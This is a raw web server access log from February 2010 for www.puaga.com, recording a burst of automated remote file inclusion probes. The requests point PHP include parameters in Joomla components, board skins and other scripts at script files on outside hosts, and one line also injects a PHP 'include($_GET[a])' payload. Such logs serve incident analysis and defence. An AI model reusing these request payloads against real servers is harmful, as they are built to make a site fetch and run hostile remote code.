58.150.99.131 - - [08/Feb/2010:07:08:00 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:08:00 -0800] "GET /include/bbs.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:08:01 -0800] "GET /logs/access_100112.log%20%20//include/bbs.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:07:08:03 -0800] "GET /logs/access_100103.log%20%20///e404.php?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:07:08:06 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:07:08:06 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:07:08:06 -0800] "GET /logs/access_100126.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:08:09 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:08:09 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:08:09 -0800] "GET /logs/access_100126.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:07:08:13 -0800] "GET /logs/access_100112.log%20%20///e404.php?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:07:08:13 -0800] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:07:08:13 -0800] "GET //e404.php?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:08:18 -0800] "GET //skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:08:18 -0800] "GET /logs///skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:08:18 -0800] "GET /logs/access_100109.log%20%20///skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:08:18 -0800] "GET //skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:08:18 -0800] "GET /logs///skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:08:18 -0800] "GET /logs/access_100109.log///skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [08/Feb/2010:07:08:26 -0800] "GET /logs/access_100103.log%20%20///e404.php?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:08:27 -0800] "GET /logs/access_100109.log///skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:08:27 -0800] "GET //skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:08:27 -0800] "GET /logs///skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:08:40 -0800] "GET /logs/access_100201.log%20%20///skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:07:08:50 -0800] "GET /logs/access_100109.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:08:57 -0800] "GET /logs/access_100201.log///skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:09:02 -0800] "GET /logs/access_100201.log///skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:07:09:04 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:07:09:04 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:07:09:04 -0800] "GET /logs/access_100126.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:09:20 -0800] "GET /logs/access_100109.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [08/Feb/2010:07:09:27 -0800] "GET /logs/access_100112.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.nsi.or.kr//ws/files/notice/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:07:09:36 -0800] "GET /logs/access_100107.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:10:33 -0800] "GET /logs/access_100109.log%20%20///skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:10:39 -0800] "GET /logs/access_100109.log%20%20///skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:10:44 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:10:44 -0800] "GET /logs/access_100126.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:10:45 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:10:58 -0800] "GET /logs/access_100201.log%20%20///skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:11:20 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:11:20 -0800] "GET /logs/access_100126.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:11:20 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:11:20 -0800] "GET /logs/access_100109.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [08/Feb/2010:07:11:21 -0800] "GET /logs/access_100129.log///?path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [08/Feb/2010:07:11:21 -0800] "GET /logs///?path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [08/Feb/2010:07:11:21 -0800] "GET //?path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [08/Feb/2010:07:11:26 -0800] "GET /logs/access_100202.log///?path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:07:12:15 -0800] "GET /administrator/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:07:12:15 -0800] "GET /logs//administrator/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:07:12:15 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:07:12:21 -0800] "GET /logs/access_100115.log%20%20//administrator/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:13:05 -0800] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:13:09 -0800] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:14:32 -0800] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:14:32 -0800] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:14:32 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:07:15:30 -0800] "GET /bbs//become_editor.php?theme_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:07:15:30 -0800] "GET /logs//bbs//become_editor.php?theme_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:07:15:30 -0800] "GET /logs/access_100127.log%20%20//bbs//become_editor.php?theme_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:07:15:30 -0800] "GET /logs/access_100203.log%20%20//bbs//become_editor.php?theme_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:07:15:33 -0800] "GET /modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:07:15:33 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:07:15:33 -0800] "GET /logs/access_100114.log//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:15:35 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:15:35 -0800] "GET /logs/access_100114.log//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:15:35 -0800] "GET /modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:07:15:35 -0800] "GET /logs/access_100130.log%20%20/index0.php?show=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:07:15:35 -0800] "GET /logs/index0.php?show=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:07:15:35 -0800] "GET /index0.php?show=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:15:36 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:15:36 -0800] "GET /modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:15:36 -0800] "GET /logs/access_100114.log%20%20//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:07:15:40 -0800] "GET /modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:07:15:40 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:07:15:40 -0800] "GET /logs/access_100114.log%20%20//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:15:44 -0800] "GET /logs/access_100109.log//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:15:45 -0800] "GET /logs/access_100109.log%20%20//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:07:15:46 -0800] "GET /logs/access_100109.log//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:15:51 -0800] "GET /modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:15:51 -0800] "GET /logs/access_100114.log//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:15:51 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:16:02 -0800] "GET /logs/access_100109.log//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:16:18 -0800] "GET /logs/access_100118.log%20%20/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:16:28 -0800] "GET /modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:16:28 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:16:28 -0800] "GET /logs/access_100109.log%20%20//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:07:16:29 -0800] "GET /index0.php?show=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:07:16:29 -0800] "GET /logs/index0.php?show=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:07:16:29 -0800] "GET /logs/access_100130.log%20%20/index0.php?show=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:17:45 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:17:45 -0800] "GET /modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:17:45 -0800] "GET /logs/access_100114.log//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:17:55 -0800] "GET /logs/access_100109.log//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:17:57 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:17:57 -0800] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:17:57 -0800] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:07:18:04 -0800] "GET /logs/access_100121.log%20%20/index0.php?show=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:07:18:07 -0800] "GET /logs/access_100121.log%20%20/index0.php?show=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:07:18:15 -0800] "GET /logs/access_100203.log//bbs//become_editor.php?theme_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:07:18:15 -0800] "GET /logs/access_100127.log//bbs//become_editor.php?theme_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:18:42 -0800] "GET /logs/access_100118.log%20%20/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:18:53 -0800] "GET /logs/access_100119.log%20%20//modules/My_eGallery/index.php?basepath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:21:35 -0800] "GET /logs/access_100118.log%20%20/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:21:49 -0800] "GET /become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:21:49 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:21:49 -0800] "GET /logs/access_100127.log%20%20/become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:21:49 -0800] "GET /logs/become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:21:49 -0800] "GET /become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:21:51 -0800] "GET /logs/become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:21:51 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:21:51 -0800] "GET /logs/access_100127.log%20%20/become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:22:28 -0800] "GET /logs/access_100109.log///skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:07:22:45 -0800] "GET /logs/access_100201.log///skin/buzzard_espoon/setup.php?dir=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:23:11 -0800] "GET /become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:23:11 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:23:11 -0800] "GET /logs/become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:23:12 -0800] "GET /logs/access_100127.log%20%20/become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.238.67 - - [08/Feb/2010:07:23:33 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.labottevini.com/site/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.238.67 - - [08/Feb/2010:07:23:33 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.labottevini.com/site/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.238.67 - - [08/Feb/2010:07:23:33 -0800] "GET /logs/access_100202.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.labottevini.com/site/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.238.67 - - [08/Feb/2010:07:24:06 -0800] "GET /logs/access_100111.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.labottevini.com/site/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:07:24:45 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
